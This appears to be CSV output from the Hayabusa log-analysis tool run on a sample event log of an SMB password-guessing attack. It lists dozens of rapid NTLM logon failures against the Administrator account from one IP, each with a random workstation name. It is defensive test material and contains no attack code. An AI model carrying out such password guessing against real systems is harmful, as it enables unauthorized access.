2016-09-20 01:50:11.704 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NE9atGNBlSLQLLcX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.744 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: a0M5EaAXziu07hOH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.784 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PM1mwxqI7yVgoK2D : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.836 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MPqnpvetHXdThxYg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.879 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gthbVQMJ7UD2QS7H : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.920 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AwwJXCoC3gMDoDn7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.068 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ilNNoVbZpyhtsNkV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.109 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eNY0lv9IglfHP34d : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.167 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BjSeQciwy17L7raV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.208 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wycE1fIsmPq9zaMU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.241 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5z1spxImm2ZlGOld : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.294 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Dg7o4GCET1bJrlEU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.376 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: E7Db3OLA0XPXL1B4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.417 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Uoqx5iPRp2tfYYos : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.448 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ixw5XWC2frtrTUkv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.495 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3v0NpzAp7io9gbZQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.536 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AfOOiR2zO5xem9Tk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.582 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yiGtitRqZbGNKrtN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.623 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7oQ70LvSMnGxBCFO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.660 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JGHr8623vHZyMY5B : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.707 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: X5Y1C9A4XqxQGoVA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.745 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SOnirLGOZzRVSt3y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.772 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jLu7XtYCHPqVNE7u : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.811 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: w242Ei1CpWErEE4m : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.847 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UOZUagVG4R6zcK92 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.891 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7hQOl8XV3Ydp8UcW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.927 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: u1XBRDfoN0I2iu6L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.963 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ngyknhk7uGvs38bG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.996 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QXZUhLVsfRUBDcsu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:13.045 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VEDAtkhiSqUcLj2i : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:13.088 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: M4CmH02M91kHzeK2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:13.125 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5St1kWrKP4PZlOIy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:13.156 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 17A6k4Om84gunQfB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:13.195 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Y9GfR4XdixrNJHny : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:13.236 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 27JWPfEV4DgS1tNv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:13.280 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yNeJnXg1pyedSpqU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:13.324 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WWihv14n9IAQXw2X : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:13.364 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Gy19bFWzQFaQZRBa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:13.412 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: N28Ec4jkXkSNvsQ1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:13.447 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sD9qQWJbeukyPQbc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:13.487 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uoRSHXvwMeKg8cyQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:13.528 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bPEOhloL7vo1fTFQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:13.564 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: glbLglffka5JqQCN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:13.612 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7MTbgvYN6PIaKxeK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:13.652 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tAjWfgmGrm3o2mAx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:13.683 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9EZYPG6uQtsez1UI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:13.720 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PRcnsdLAKd7enemG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:13.759 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OUZEQaUavv7fWk4w : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:13.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JKth56VEMqMCgwG9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:13.834 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TCGlvOFFkVpSHSoM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:13.860 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jmLxSIastsvqdJC8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:13.895 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IPyvUDHHWzbhyvZE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:13.935 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: S7dF4fIlAvIBYiw0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:13.976 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bPDPtH2m9TgW8Khg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:14.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AChGHCNom0ds5ujV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:14.052 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8sLQI4KGgQRq2Sy9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:14.088 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dqeLFLRT5EXiCBUC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:14.124 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Dx3tco9up7XnOa7h : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:14.159 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZdNX4ubtpQaV9EeF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:14.189 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: S05I0ZlGKGazkVkL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:14.228 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pzbfrYSYhxH6WcCt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:14.304 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZGTvXs8Mlc0Fi7iT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:14.345 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: C1LjtTFjPfPlBqAi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:14.389 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1lhJW3iO1xGGTMhp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:14.427 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IMz7WmlBTgadVgN8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:14.468 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OB02epCA5pc5oBeJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:14.503 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KAFgReUMtu9VerRl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:14.543 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ByeL26yQfohpQT3z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:14.597 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 527r3nh9ocmItXfL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:14.637 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HNeC1BBFVXv839Ys : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:14.673 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: juXXpQcoPfJLMQ3L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:14.708 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: njNdv4lGnsUpooCP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:14.748 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j6VchLhWJT7cCWVR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:14.788 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: r3xxnFpbd8zkFm0h : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:14.824 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jtf156NEpOebQHGC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
